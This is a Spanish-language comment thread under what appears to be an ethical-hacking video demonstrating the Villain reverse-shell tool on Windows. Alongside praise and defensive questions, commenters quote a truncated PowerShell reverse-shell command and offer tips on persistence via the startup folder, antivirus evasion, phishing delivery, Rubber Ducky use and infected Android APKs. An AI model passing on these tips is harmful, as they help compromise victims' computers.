🚀 Aprende ciberseguridad y hacking ético desde cero con nuestra academia El Rincón del Hacker!! elrincondelhacker.es 🎓 Curso Preparación eJPT: elrincondelhacker.es/courses/preparacion-certificacion-ejptv2/ 🎓 Curso de Linux y Bash Scripting: elrincondelhacker.es/courses/curso-de-linux-y-bash-scripting/ 🎓 Curso de Docker: elrincondelhacker.es/courses/curso-de-docker/ Hosting que recomiendo: raiolanetworks.com/landing/hosting-elpinguinodemario/
Eres un crack y de los buenos, esa shell te deja hacer keylogger en la máquina víctima, piensa algo de keylogger por mail o ngrok. Recomiendo Saint. Gracias
Me preguntó si algunas bases de datos de antivirus ya están actualizadas para este tipo de payloads, ya había investigado algo sobre la herramienta pero no la había visto en acción, excelente información Mario
¿Y si por algún casual te lo hicieran?, Con algún sniffer se podría detectar esa conexión remota?, Estaría bien aprender más a interpretar lo que sale en los sniffers para detectar este tipo de ataques. ¿No existen herramientas que usen en realtime algún sniffer para hacer detecciones de anomalías en tu red al vuelo?. Un saludo y felicidades por el canal!
yo creo que podrias hacerlo, con wireshark, pero es una herramienta muy general y tendrian que tener conocimientos en redes para poder detectar, no se si habran herramientas mas automatizadas
Buenas Mario, me encantan tus vídeos. Quisiera hacerte una pregunta, cómo consigues actualizarte en este tema, por ejemplo como te has enterado de que ha salido este payload o que por ejemplo lo han actualizado. Gracias y sigue así que me tienes enganchado a tus vídeos.
Muchísimas gracias por el apoyo!!! Se agradece un montón jeje en cuanto a la pregunta, en el ejemplo de este vídeo me enteré gracias a un seguidor que me lo dijo en el grupo de Telegram, pero en general no hago nada en especial para mantenerme actualizado, simplemente trato de aprender algo nuevo cada día y de esa forma me mantengo actualizado y mejoro constantemente 💪🏻💪🏻
Herramientas como éstas hay a patadas y a las pocas semanas de publicarse, sus firmas de detección (hashes, fuzzy hashes, reglas yara, etc) son publicadas y son detectadas enseguida. Así es la historia de las herramientas de evasión ;) Afortunadamente los fabricante de antimalware (incluyendo Microsoft con Defender) hacen los deberes aunque cada vez lo tienen más difícil. Por eso las soluciones tradicionales basadas en firmas no sirven en organizaciones objetivo de ataques: tienen que usar EDR, XDR, NDR, etc y todo este tipo de soluciones que además analizan comportamiento, utilizan IA, fuentes de inteligencia, análisis de sandbox en la nube, etc porque no es suficiente con las firmas. Saludos
Una pregunta, ¿cabe la posibilidad de que no detecte por ser una ip (la del "atacante"), en la misma red de casa? (no entiendo mucho, ni soy fan de windows, pero me ha dado que pensar). Gracias.
amigo cómo estas excelente video, instale vitual box y luego kali linx en virtual box, no entiendo porque no logro ver la barra de tareas. que puedo hacer, gracias de antemano
Hola! En este caso para móvil no funcionaría ya que está hecha para atacar Linux o Windows , para Android hay un módulo de msfvenom que nos permite crear una apk infectada y ganar acceso remoto a Android 👍🏻
Qué facil es que nos puedan hackear!, Hay que tener cuidado con lo que recibimos por correo, por whatsapp web, o cualquier medio. Una pregunta El Pinguino de Mario, este payload se puede esconder en cualquier archivo, ya que si vemos un comando con mucho texto "raro", optariamos por no hacer nada y borrarlo, pero supongo que gente malintencionada podria esconder todo ese codigo en algun fichero. Como se podria hacer eso, digo para fines educativos. ya que en otro de tus videos se pudo esconder otro payload en un PDF. Y por ultimo, ningun antivirus es capaz de detectarlo? Tambien funciona en Celulares?. Un saludos y contenido muy interesante y educativo.
hola bro quisiera hacerte una pregunta, y si genero ese codigo lo guardo y apago mi pc y la vuelvo a encender y pongo ese codigo en una maquina windows, como vuelvo a donde estaba antes en kali linux
hola mario. al ahora de ejecutar python3 Villain.py me sale una cantidad de cosas a lo ultimo dice ModuleNotFoundError: No module named 'netifaces' .. sabes que puede ser?
Me apareció un mensaje en la consola que dice " Este script contiene elementos malintencionados y ha sido bloqueado por el software antivirus", que solución tendría eso?
Lo que da temor de estas herramientas ya creadas es que si ya tienen potencial en su labor, imagina si al creador le da por hacer el hack a través de su herramienta para la gente que la descargue e utilice, yo al menos hasta que no vea como funciona ese .py no lo ejecutaría. No quito ningún mérito pero me gusta tener mil ojos.
mi pregunta sería, si alguien accede a tu pc, como se podría liberar uno de esto? Me lo han hecho y no se como actuar, con pasar en modo seguro algun anti malware y formatear es suficiente?
consulta, tiene persistencia? osea se guardan las victimas al momento de realizar esto, recuerdo que ocupaba turkojan y cada vez que reinicaban el pc me volvian a aparecer las victimas en una fila con su ip gracias.
Muy bueno, y respecto a tu pregunta ovbiamenre ya no podrian ya que estas aplicando basicamente lo que es zero trust en terminos de ciberseguridad (filtros de firewall) muy bueno el uso de tiny wall me sorprende asi deberian ser todos pero tendrias que tener conocimiento, yo uso otro aplicativo que funciona como lista negra y blanca y gris y asi nos aseguramos mejor, solo que para que el sistema llegue a funcionar bien como cualquier otro tenes que dar el correcto permisos a distinto servicios, (y) saludos
Hola!! Es difícil mantenerse siempre 100% actualizado, pero la clave es aprender a entender el funcionamiento del Hacking y todo lo que ello conlleva, y así es muy fácil actualizarse con lo que vayas necesitando 👍🏻
no entiendo que sentido tiene esto si no nos va a decir como protegernos. despues de todo el usuario victima tiene que ejecutar tu codigo generado en una terminal, asique la manera mas segura de protegerse es no andar en cosas raras. cualquier programa de tercero no firmado podria ejecutarte ese codigo y convertirte en victima. gracias a cosas como estas toda la gente optara por pagar en microsoft store por sus programas y juegos en steam o epic games. fuentes oficiales. se termina la livertad para usuarios de escritorio
Quiero hacer un pentest para mis celulares iOS y android. Puedes hacer un tutorial de eso ? Es lo que me falta por aprender. Quiero decir tener acceso remoto ver archivos ect
@@AnimashDaje en windows existe un directorio que todo lo que allí agregues se ejecuta en cada inicio. Tecla Windows + R : shell:startup Si logras colarte una vez, llega hasta el directorio que te indique y planta allí el payload así puedes ganar acceso en el próximo reinicio (solo tendrías que estar sniffeando constantemente para lograr el acceso) lo he probado con otros métodos de shell reverse y funciona
Justo hoy instale un juego por mediafire y justo un segundo después de que descomprimí el juego me salto una notificación de dos troyanos, uno que se llamaba “Backdoor” y el otro que se llama “Bladabindi”, si fuera verdad que ese archivo .rar tenía esos dos troyanos ps me jodí, me gustaría saber como des hacerme de ellos, aunque en este PC no tengo nada importante que puedan hackear
pueden mirar tus camaras, tu microfono, eliminar y poner archivos en tu computador y aparte pueden hacer ataques con tu pc y dejandolo como si fueras tu
@@onsitesalzitahx es verdad lo que dice mauricio, si no lo haces y si es un ataque o un profesional, lo puede hacer sin que te des de cuenta y extorsionarte, es mejor que la formatees si no lo haces corre tu el riesgo...
no se entiende tu pregunta. lo que es fuera de internet es local. tu ip publica es visible por otros de pende a donde te conectes si te conectas a youtube, este vera tu ip publica pero si tenes un servidor de lo que sea, cuando se conecten a vos, veras sus ip publica. fuera de internet osea la local te la da tu router y la publica te la da tu proovedor de internet. incluso a veces no tenes la posibilidad de cambiar tu ip publica. asique la publica es de internet y la privada es la local.
Y luego como podrias acceder desde una red externa?, porque seguramente has hecho esta demostracion en dos SO pero que estan conectados a tu misma red. Como harías para ejecutar esa revershell desde una red externa?, por ejemplo, estando tu conectado desde casa y el otro dispositivo estuviera en una bibilioteca?..
Estaba pensando que ejecutando esto desde un USB tipo Ruber Ducky o Bad USB, lias la de Dios, por ejemplo un ordenador del trabajo, un banco al que se lo puedas conectar con ingeniería social, u otros ejemplos..... aunque sería más peligroso con un rat, que con un simple payload.
Mario, venga te expongo un reto y a ver si tienes web0s de hacer un vídeo 😉 Déjate de tanto Kali Linux que parece que no hay otra cosa. Y haz un vídeo hackeando un Windows desde otro Windows sin que te lo detecte ningún antivirus. Venga, que es súper fácil. Desde dentro de la red o fuera de la red con ngrok que sabes que es sencillo. Cómo quieras, pero sin usar el clásico netcat que te lo detecta cualquier antivirus a la más mínima. Venga y así muestras tus dotes de obfuscador.
@@chupete1011 jaja es un buen reto, diría de hacerlo todo con Python, por ejemplo tengo este vídeo que más o menos lo consigo: 🔴 HACKING ÉTICO - Cómo Obtener REVERSE SHELL con PYTHON | INDETECTABLE por el ANTIVIRUS 🐍 ruclips.net/video/VT7Mwe8c6Ec/видео.html Aunque estoy preparando más vídeos con la librería pwntools de Python para hacer más Hacking ético con Python y eso se puede lanzar desde Windows 😁
Bueno usa Python para hacer un script que codifique un troyano por ejemplo y luego lo lanzas desde un bat con comandos de powershell y es bastante efectivo. Y en el vídeo que dices usas Python pero no sólo en la vida todo es Python, aunque con Python puedes crear el payload, el obfuscador, y luego ya solo es generar el bat para ejecutarlo desde powershell.
Lo intente hoy 24 julio de 2023 desde mi maquina virtual Linux a una laptop con Windows 11 Home y Powershell bloquea el comando con el siguiente mensaje: En línea: 1 Carácter: 1 + Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Obj ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Este script contiene elementos malintencionados y ha sido bloqueado por el software antivirus. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ScriptContainedMaliciousContent
Que bueno saberlo para tratar de erradicar esa payload, ahora creo que si se hace un bat y se manda vía correo a víctima se crea conexión. Pero no modo persistente
Exacto!! La verdad que es un peligro, veremos si lo parchean y se actualiza el defender, para este tipo de métodos suelen funcionar un tiempo hasta que se actualiza el sistema
@@lucascaskajillo540 claro quedar en segundo plano, estoy consciente en eso enmascarer el código malicioso, con un técnica de ingeniería social o phishin,
@@fpsllordd4rk921 Exactamente, lo ocultas en un programa, o peor aún en un Antivirus, y ahí tienes el protector Antivirus y el Payload indetectable de antivirus usando la técnica del Phising
🚀 Aprende ciberseguridad y hacking ético desde cero con nuestra academia El Rincón del Hacker!! elrincondelhacker.es
🎓 Curso Preparación eJPT: elrincondelhacker.es/courses/preparacion-certificacion-ejptv2/
🎓 Curso de Linux y Bash Scripting: elrincondelhacker.es/courses/curso-de-linux-y-bash-scripting/
🎓 Curso de Docker: elrincondelhacker.es/courses/curso-de-docker/
Hosting que recomiendo: raiolanetworks.com/landing/hosting-elpinguinodemario/
Siempre subes cosas súper interesantes y útiles! Eres muy muy bueno!
Eres un crack y de los buenos, esa shell te deja hacer keylogger en la máquina víctima, piensa algo de keylogger por mail o ngrok. Recomiendo Saint. Gracias
Muchas gracias por el apoyo!! 😁
Excelente video, es una herramienta bastante interesante!....
Me preguntó si algunas bases de datos de antivirus ya están actualizadas para este tipo de payloads, ya había investigado algo sobre la herramienta pero no la había visto en acción, excelente información Mario
Sería cuestión de investigar, aunque pocos antivirus creo que estén actualizados para esto de momento, es cuestión de esperar hasta que se actualicen
@@ElPinguinoDeMario ya esta ree parcheado xd
Siii?
Gracias Master por estas clases tan interesantes....
Muchas gracias!! 😁
@@ElPinguinoDeMario A ti Makina....
Excelente video muy pronto lo pondré a prueba
Muchas gracias!! Ahora el defender ya se actualizo, pero quitando eso sigue funcionando 😁
¿Y si por algún casual te lo hicieran?, Con algún sniffer se podría detectar esa conexión remota?, Estaría bien aprender más a interpretar lo que sale en los sniffers para detectar este tipo de ataques. ¿No existen herramientas que usen en realtime algún sniffer para hacer detecciones de anomalías en tu red al vuelo?. Un saludo y felicidades por el canal!
yo creo que podrias hacerlo, con wireshark, pero es una herramienta muy general y tendrian que tener conocimientos en redes para poder detectar, no se si habran herramientas mas automatizadas
Este canal vale oro!
Muchas gracias!! Se agradece mucho el apoyo 💪🏻
Buenas Mario, me encantan tus vídeos. Quisiera hacerte una pregunta, cómo consigues actualizarte en este tema, por ejemplo como te has enterado de que ha salido este payload o que por ejemplo lo han actualizado. Gracias y sigue así que me tienes enganchado a tus vídeos.
Muchísimas gracias por el apoyo!!! Se agradece un montón jeje en cuanto a la pregunta, en el ejemplo de este vídeo me enteré gracias a un seguidor que me lo dijo en el grupo de Telegram, pero en general no hago nada en especial para mantenerme actualizado, simplemente trato de aprender algo nuevo cada día y de esa forma me mantengo actualizado y mejoro constantemente 💪🏻💪🏻
Herramientas como éstas hay a patadas y a las pocas semanas de publicarse, sus firmas de detección (hashes, fuzzy hashes, reglas yara, etc) son publicadas y son detectadas enseguida. Así es la historia de las herramientas de evasión ;) Afortunadamente los fabricante de antimalware (incluyendo Microsoft con Defender) hacen los deberes aunque cada vez lo tienen más difícil. Por eso las soluciones tradicionales basadas en firmas no sirven en organizaciones objetivo de ataques: tienen que usar EDR, XDR, NDR, etc y todo este tipo de soluciones que además analizan comportamiento, utilizan IA, fuentes de inteligencia, análisis de sandbox en la nube, etc porque no es suficiente con las firmas. Saludos
Exacto!! Por eso esta genial mostrar la existencia de estas herramientas para concienciarnos de lo fácil que es que lleguemos a ser hackeados 😁💪🏻
seria bueno que lo pruebes en una pc de alguna persona que este lejos porque para eso es otro metodo que explica en el video del creador de villain
saludos mi amigo---- pero ya el antivirus defender lo bloquea.... tengo windows 10 actualizado ... fecha de la penetracion 26/11/2023
Una pregunta, ¿cabe la posibilidad de que no detecte por ser una ip (la del "atacante"), en la misma red de casa? (no entiendo mucho, ni soy fan de windows, pero me ha dado que pensar). Gracias.
Siempre es más recomendable diseñar un código propio en Python para hacer esto. Gracias mario
actualmente no funciona el metodo :(
Hice un malware en python pero no se como evitar el windows defender@@carlosastete4290
amigo cómo estas excelente video, instale vitual box y luego kali linx en virtual box, no entiendo porque no logro ver la barra de tareas. que puedo hacer, gracias de antemano
buen vídeo!!! esta herramienta funciona para Android ??🤔🤔🤔 para móvil? si no funciona estaría bien alguna como esta para móviles gracias!!🎅🎅💪💪👍
Hola! En este caso para móvil no funcionaría ya que está hecha para atacar Linux o Windows , para Android hay un módulo de msfvenom que nos permite crear una apk infectada y ganar acceso remoto a Android 👍🏻
ya no funciona lo detecta como script malicioso al momento de ingresar el payload :(
Sii exacto, con el tiempo lo han corregido aunque puede seguir siendo útil para equipos desactualizados 👍🏻
Gracias gran aporte
Muchas gracias por el apoyo!!!
sale acceso denegado en la maquina windows
Qué facil es que nos puedan hackear!, Hay que tener cuidado con lo que recibimos por correo, por whatsapp web, o cualquier medio. Una pregunta El Pinguino de Mario, este payload se puede esconder en cualquier archivo, ya que si vemos un comando con mucho texto "raro", optariamos por no hacer nada y borrarlo, pero supongo que gente malintencionada podria esconder todo ese codigo en algun fichero. Como se podria hacer eso, digo para fines educativos. ya que en otro de tus videos se pudo esconder otro payload en un PDF. Y por ultimo, ningun antivirus es capaz de detectarlo? Tambien funciona en Celulares?. Un saludos y contenido muy interesante y educativo.
Haces un bat luego lo escondes como viste en el caso del PDF
Muy bueno pinguino, hay muchas herramientas asi y es sencillo de crear estos rats, lo suyo seria que viniesen con 0 days para escalar privilegios xD
Exacto! Aunque ya con el simple hecho de poder acceder a una máquina de forma tan fácil es increíble 😱
en caso mio no funciona por mas que desactivo los antivirus. me vota el mensaje acceso denegado.. aun asi si lo ejecuto en una cmd como administrador
Bro hay alguna manera de meterle ese comando, y ajuntarlo con un programa .exe? Para que cuando lo descarguen y lo instalen te bote le shell?
I want to know
hola bro quisiera hacerte una pregunta, y si genero ese codigo lo guardo y apago mi pc y la vuelvo a encender y pongo ese codigo en una maquina windows, como vuelvo a donde estaba antes en kali linux
Si lo creas en una Máquina Virtual puedes suspenderla
muchas gracias!!!
okay pero para para que funcione se la persona tiene que ejecutarlo en su terminal ?
hola mario. al ahora de ejecutar python3 Villain.py me sale una cantidad de cosas a lo ultimo dice ModuleNotFoundError: No module named 'netifaces' .. sabes que puede ser?
pip3 install netifaces
@@unastar gracias colega
pero solo el antivirus de windows no detecta eso o tambien ningun otro antivirus??
Hola, queria preguntaros ¿Te pueden hackear con eso o algo parecido sin descargarse nada? Y tener acceso remoto?
Me apareció un mensaje en la consola que dice " Este script contiene elementos malintencionados y ha sido bloqueado por el software antivirus", que solución tendría eso?
Hola!! el Windows defender se actualizo y a día de hoy ya no es vulnerable 🤷🏻♂️
Lo que da temor de estas herramientas ya creadas es que si ya tienen potencial en su labor, imagina si al creador le da por hacer el hack a través de su herramienta para la gente que la descargue e utilice, yo al menos hasta que no vea como funciona ese .py no lo ejecutaría. No quito ningún mérito pero me gusta tener mil ojos.
Quién metería datos importantes en una máquina virtual de kali? xD
Había oído que algunos en la Ciberseguridad se volvían paranoicos, pero no lo creía...
Me dice:
Required argument PAYLOAD not supplied.
hace connect tu direccion ip del kali 6501
@@marraqueta8399le puse connect 192.... 6501
Y me dice acción denegada
Qué procede?
mi pregunta sería, si alguien accede a tu pc, como se podría liberar uno de esto? Me lo han hecho y no se como actuar, con pasar en modo seguro algun anti malware y formatear es suficiente?
Me paso, lo pudiste solucionar amigo?
consulta, tiene persistencia? osea se guardan las victimas al momento de realizar esto, recuerdo que ocupaba turkojan y cada vez que reinicaban el pc me volvian a aparecer las victimas en una fila con su ip gracias.
tiene?
En el minuto 1:24 se puede observar como se le salen los colmillos a Mario
ya esta capado, podria haber otro backdoor indetectable?
Lo han capado efectivamente, habría que mirar nuevas herramientas, de todos modos esta es muy útil para Windows desactualizados 🤷🏻♂️
Lo han parchao, ahora si lo detecta :(
Tengo tinywall y solo le doy permisos de salida a navegador y 5 programas el resto lo bloqueo todo, igual me puede hackear con esa herramienta?
Muy bueno, y respecto a tu pregunta ovbiamenre ya no podrian ya que estas aplicando basicamente lo que es zero trust en terminos de ciberseguridad (filtros de firewall) muy bueno el uso de tiny wall me sorprende asi deberian ser todos pero tendrias que tener conocimiento, yo uso otro aplicativo que funciona como lista negra y blanca y gris y asi nos aseguramos mejor, solo que para que el sistema llegue a funcionar bien como cualquier otro tenes que dar el correcto permisos a distinto servicios, (y) saludos
como son los comandos para poder descargar los archivos?
Amigo de dónde mantienes actualizado de toda esta información? sirve para equipos fuera del lan?
Hola!! Es difícil mantenerse siempre 100% actualizado, pero la clave es aprender a entender el funcionamiento del Hacking y todo lo que ello conlleva, y así es muy fácil actualizarse con lo que vayas necesitando 👍🏻
pero ese peiloc se puede hacer auto ejectutable
EXCELENTE VÍDEO SALUDOS DESDE ECUADOR , como le harías para camuflar ese código y que la victima lo ejecute _
ya lo parchearon
debe estar en la misma red no?
hola algun curso de linux que recomiendes?? saludos
Hola!! Te recomiendo instalar Linux en tu ordenador e ir aprendiendo día a día, como instalar programas, eliminar, comandos, etc 👍🏻
No funciona con kali Ubuntu
no entiendo que sentido tiene esto si no nos va a decir como protegernos. despues de todo el usuario victima tiene que ejecutar tu codigo generado en una terminal, asique la manera mas segura de protegerse es no andar en cosas raras. cualquier programa de tercero no firmado podria ejecutarte ese codigo y convertirte en victima. gracias a cosas como estas toda la gente optara por pagar en microsoft store por sus programas y juegos en steam o epic games. fuentes oficiales. se termina la livertad para usuarios de escritorio
Nada mas empezar el video se me encogio el qlo.
Quiero hacer un pentest para mis celulares iOS y android. Puedes hacer un tutorial de eso ? Es lo que me falta por aprender. Quiero decir tener acceso remoto ver archivos ect
Hola!! En mi caso tengo muy pocos conocimientos de hacking en teléfonos 🤷🏻♂️
@@ElPinguinoDeMario entendido Gracias de todos modos
Para mi usted sabe muchísimo 🙏🏿
A mi me funcionaba la volvi a probar y no hace nada jajajajaja.
si cierran la powershell se apaga la shellreversa o se mantiene para siempre
Hola!! Creo que se cerraría 💪🏻
4:05 ayuda me aparece "required argument payload not supplied" que hago :(
ya lo arreglaste? se la solucion
Uatt
funciona fuera de la red local?
Una pregunta, ¿Esto es fuera de la lan? Gracias.
Hola!! En el vídeo es dentro de la lan, aunque podría funcionar fuera también 👍🏻
Como creo una persistencia con ese backdoor que subiste?
bro si lo encuentras comparte porfa
@@AnimashDaje en windows existe un directorio que todo lo que allí agregues se ejecuta en cada inicio. Tecla Windows + R : shell:startup
Si logras colarte una vez, llega hasta el directorio que te indique y planta allí el payload así puedes ganar acceso en el próximo reinicio (solo tendrías que estar sniffeando constantemente para lograr el acceso) lo he probado con otros métodos de shell reverse y funciona
Justo hoy instale un juego por mediafire y justo un segundo después de que descomprimí el juego me salto una notificación de dos troyanos, uno que se llamaba “Backdoor” y el otro que se llama “Bladabindi”, si fuera verdad que ese archivo .rar tenía esos dos troyanos ps me jodí, me gustaría saber como des hacerme de ellos, aunque en este PC no tengo nada importante que puedan hackear
pueden mirar tus camaras, tu microfono, eliminar y poner archivos en tu computador y aparte pueden hacer ataques con tu pc y dejandolo como si fueras tu
@@gatras1540 diablo loco, wazaaa👻👻👻, ok ya hablando en serio, what, y no hay forma de zafarse de eso?
@@onsitesalzitahx formatear el pc y aprender la lección, "Lo gratis sale caro después" .
@@mauriciopinto2669 Noooo KAJAJSJAKJA que vrg, bueno, igual gracias
@@onsitesalzitahx es verdad lo que dice mauricio, si no lo haces y si es un ataque o un profesional, lo puede hacer sin que te des de cuenta y extorsionarte, es mejor que la formatees si no lo haces corre tu el riesgo...
Bro has un videos de backdoor fuera de la lan
También se puede aplicar en Ubuntu o solo es para kali?
Hola!! En este caso se aplica para cualquier sistema Linux 👍🏻
Ya lo detecta el antivirus, buenas tardes
Sii exacto 🤷🏻♂️
para fuera de internet hay que poner ip publica no?
no se entiende tu pregunta. lo que es fuera de internet es local. tu ip publica es visible por otros de pende a donde te conectes si te conectas a youtube, este vera tu ip publica pero si tenes un servidor de lo que sea, cuando se conecten a vos, veras sus ip publica. fuera de internet osea la local te la da tu router y la publica te la da tu proovedor de internet. incluso a veces no tenes la posibilidad de cambiar tu ip publica. asique la publica es de internet y la privada es la local.
Y luego como podrias acceder desde una red externa?, porque seguramente has hecho esta demostracion en dos SO pero que estan conectados a tu misma red. Como harías para ejecutar esa revershell desde una red externa?, por ejemplo, estando tu conectado desde casa y el otro dispositivo estuviera en una bibilioteca?..
eso ya nos toca a nosotro 👌
Estaba pensando que ejecutando esto desde un USB tipo Ruber Ducky o Bad USB, lias la de Dios, por ejemplo un ordenador del trabajo, un banco al que se lo puedas conectar con ingeniería social, u otros ejemplos..... aunque sería más peligroso con un rat, que con un simple payload.
Exacto!! Por eso esta bien mostrarlo porque son herramientas con mucho potencial y tenemos que tener cuidado 🤷🏻♂️
Mario, venga te expongo un reto y a ver si tienes web0s de hacer un vídeo 😉
Déjate de tanto Kali Linux que parece que no hay otra cosa.
Y haz un vídeo hackeando un Windows desde otro Windows sin que te lo detecte ningún antivirus.
Venga, que es súper fácil.
Desde dentro de la red o fuera de la red con ngrok que sabes que es sencillo. Cómo quieras, pero sin usar el clásico netcat que te lo detecta cualquier antivirus a la más mínima.
Venga y así muestras tus dotes de obfuscador.
@@chupete1011 jaja es un buen reto, diría de hacerlo todo con Python, por ejemplo tengo este vídeo que más o menos lo consigo:
🔴 HACKING ÉTICO - Cómo Obtener REVERSE SHELL con PYTHON | INDETECTABLE por el ANTIVIRUS 🐍
ruclips.net/video/VT7Mwe8c6Ec/видео.html
Aunque estoy preparando más vídeos con la librería pwntools de Python para hacer más Hacking ético con Python y eso se puede lanzar desde Windows 😁
Bueno usa Python para hacer un script que codifique un troyano por ejemplo y luego lo lanzas desde un bat con comandos de powershell y es bastante efectivo.
Y en el vídeo que dices usas Python pero no sólo en la vida todo es Python, aunque con Python puedes crear el payload, el obfuscador, y luego ya solo es generar el bat para ejecutarlo desde powershell.
que método usarias para ejecutar esto desde una rubber ducky ?
Estos triste, ya no funciona, tenia proyectos con esta herramienta 🙁🙁
Fue bonito mientras duro, aunque quizá actualizan la herramienta 🤷🏻♂️
funciona para android ?
es solo en local?
Vaya miedo, madre mía
La verdad que si!! Pero esta bien conocer este tipo de riesgos para protegernos 👍🏻
Lo intente hoy 24 julio de 2023 desde mi maquina virtual Linux a una laptop con Windows 11 Home y Powershell bloquea el comando con el siguiente mensaje: En línea: 1 Carácter: 1
+ Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Obj ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Este script contiene elementos malintencionados y ha sido bloqueado por el software antivirus.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
Alguien sabe como ocultarlo para que el Antivirus No lo detecte? o algún foro de hacking ético que me recomeinden para solucionar este tipo de dudas?
ya fue parcheado@@kendalldg7632
ya lo detecta gente
😊
Prefiero la ofuscacion manual
Es lo ideal claramente 🤷🏻♂️
Ya no funciona
Exacto, ya fue parcheado, aunque aún así es muy útil para poder utilizarlo en versiones desactualizadas 👍🏻
jeje mi antivirus si lo detectó
ya lo parcharon ;(
Sii exacto, aunque sigue siendo una herramienta útil 💪🏻
SI FINES ETICOS :V
Los de Microsoft ya lo habrán parcheado
Ya está parcheadisimo
Que bueno saberlo para tratar de erradicar esa payload, ahora creo que si se hace un bat y se manda vía correo a víctima se crea conexión. Pero no modo persistente
Exacto!! La verdad que es un peligro, veremos si lo parchean y se actualiza el defender, para este tipo de métodos suelen funcionar un tiempo hasta que se actualiza el sistema
Se puede hacer, y además si lo cifras y lo pones en tipo ejecutable y lo copias a la carpeta de inicio entonces si que es persistente
@@lucascaskajillo540 claro quedar en segundo plano, estoy consciente en eso enmascarer el código malicioso, con un técnica de ingeniería social o phishin,
@@fpsllordd4rk921 Exactamente, lo ocultas en un programa, o peor aún en un Antivirus, y ahí tienes el protector Antivirus y el Payload indetectable de antivirus usando la técnica del Phising
@@lucascaskajillo540 tecnica de evacion de firewall, antivirus con esta herramienta
Parcheado
Esta re detectado
Sii solo fue válido durante unos días 🤷🏻♂️
te doxeaste?